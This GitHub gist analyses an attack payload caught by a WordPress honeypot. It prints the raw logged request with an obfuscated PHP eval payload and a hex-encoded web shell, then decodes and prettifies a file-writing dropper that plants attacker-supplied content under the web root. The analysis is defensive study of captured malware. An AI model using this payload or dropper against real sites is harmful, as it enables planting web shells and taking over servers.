Skip to content

Instantly share code, notes, and snippets.

@dustyfresh

dustyfresh/honeypress-payload-1.md

Last active February 15, 2018 15:22
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dustyfresh/42551964a91e2cac4c0f39a2a3e2e372 to your computer and use it in GitHub Desktop.
Save dustyfresh/42551964a91e2cac4c0f39a2a3e2e372 to your computer and use it in GitHub Desktop.
Download ZIP
analysis of one of the first payloads caught by HoneyPress
Raw
honeypress-payload-1.md

Interesting payload:

195.154.183.187 - - [12/Jun/2016 18:46:03] "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D6261736536345F6465636F646528245F504F53545B277A30275D293B20406576616C28225C24736166656467203D202478737365723B22293B207D203F3EGET /wp-content/plugins/thumbnail.php HTTP/1.1" 404 -

Cleaned up the output with html decode:

coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D6261736536345F6465636F646528245F504F53545B277A30275D293B20406576616C28225C24736166656467203D202478737365723B22293B207D203F3EGET

Looks like there's some eval base64 shit going on here... let's see what it is:

ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);$npath=$_SERVER['DOCUMENT_ROOT'].BaSE64_dEcOdE($_GET['z4']);function createFolder($path){if(!file_exists($path)){createFolder(dirname($path));mkdir($path, 0777);}}createFolder($npath);echo("->|");;$c=$_POST["z2"];$f=$npath.BaSE64_dEcOdE($_GET["z3"]);$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();

Prettyfied:

<?php
ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$npath = $_SERVER['DOCUMENT_ROOT'] . BaSE64_dEcOdE($_GET['z4']);

function createFolder($path)
	{
	if (!file_exists($path))
		{
		createFolder(dirname($path));
		mkdir($path, 0777);
		}
	}

createFolder($npath);
echo ("->|");;
$c = $_POST["z2"];
$f = $npath . BaSE64_dEcOdE($_GET["z3"]);
$c = str_replace("\r", "", $c);
$c = str_replace("\n", "", $c);
$buf = "";

for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));
echo (@fwrite(fopen($f, "w") , $buf) ? "1" : "0");;
echo ("|<-");
die();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment